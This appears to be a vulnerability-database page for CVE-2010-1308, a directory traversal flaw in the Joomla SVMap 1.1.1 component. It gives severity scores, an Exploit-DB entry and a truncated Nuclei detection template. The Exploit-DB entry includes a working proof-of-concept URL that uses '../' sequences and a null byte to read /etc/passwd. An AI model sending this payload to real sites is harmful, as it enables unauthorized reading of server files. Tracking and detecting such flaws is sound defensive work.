CVE-2010-1308
published 2010-04-08CVE-2010-1308: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in…
PriorityP338medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
14.00%
96.1th percentile
Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| la-souris-verte | com_svmap | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component SVMap 1.1.1 - Local File Inclusion
exploitdb·2010-04-05
CVE-2010-1308 Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
---
Title : Joomla Component com_svmap v1.1.1 LFI Vulnerability
Vendor : http://www.la-souris-verte.com
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
[+] Exploit
http://[site]/[path]/index.php?option=com_svmap&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
# c0li.m0de.0n
Nuclei
Joomla! Component SVMap 1.1.1 - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1308 [MEDIUM] Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1308
info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://ww
http://packetstormsecurity.org/1004-exploits/joomlasvmap-lfi.txthttp://secunia.com/advisories/39350http://www.exploit-db.com/exploits/12066http://www.vupen.com/english/advisories/2010/0809http://packetstormsecurity.org/1004-exploits/joomlasvmap-lfi.txthttp://secunia.com/advisories/39350http://www.exploit-db.com/exploits/12066http://www.vupen.com/english/advisories/2010/0809
2010-04-08
Published